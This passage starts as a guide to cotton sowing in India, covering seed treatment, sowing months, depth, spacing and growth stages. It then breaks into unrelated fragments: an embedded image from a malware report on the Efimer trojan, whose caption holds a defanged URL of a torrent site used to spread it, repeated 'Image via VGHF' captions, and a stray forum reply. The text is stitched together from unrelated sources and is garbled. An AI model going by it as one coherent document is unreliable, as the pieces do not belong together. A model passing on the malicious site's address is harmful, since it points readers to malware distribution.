germinate better and resist early pests and diseases: • Fungicides: Prevent damping-off, Fusarium wilt, and seed rot • Insecticides: Protect from soil-borne insects • Bio-stimulants: Enhance root development • Rhizobium or Azospirillum: Inoculants for nitrogen fixation (used in organic farming) Sowing Cotton Seeds Sowing Cotton Seeds Sowing cotton seeds is a crucial step in cotton farming, directly influencing germination, plant spacing, and eventual yield. The ideal time for sowing depends on the region April to June in North India and June to July in the South. Before sowing, seeds should be treated with fungicides or biostimulants to protect against early pests and diseases. Farmers can use manual methods like dibbling or adopt mechanized sowing with seed drills for precision. The recommended sowing depth is about 4–5 cm, ensuring seeds are neither too shallow nor too deep. Spacing varies with variety Bt and hybrid cotton usually need 75 × 30 cm, while high-density planting systems (HDPS) use 60 × 15 cm. When to sow cotton? • North India: April–June • South/Central India: June–July Growth Stages: From Flower to Boll Cotton has distinct growth stages: 1. Vegetative (0–35 days) – root and leaf development 2. Square formation (35–50 days) – flower buds appear 3. Flowering (50–75 days) – needs optimal nutrition 4. Boll development (75–120 days) – water-sensitive period 5. Boll opening (120–160 days) – maturity, prepare for harvest
![Here's an example of such a post on https://lovetahq[.]com/sinners-2025-torent-file/](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/08/07001809/efimer-trojan15.png "Here's an example of such a post on https://lovetahq[.]com/sinners-2025-torent-file/")
Image via VGHF.
Image via VGHF.
Image via VGHF.
OrionBelt©
in reply to simona • • •simona likes this.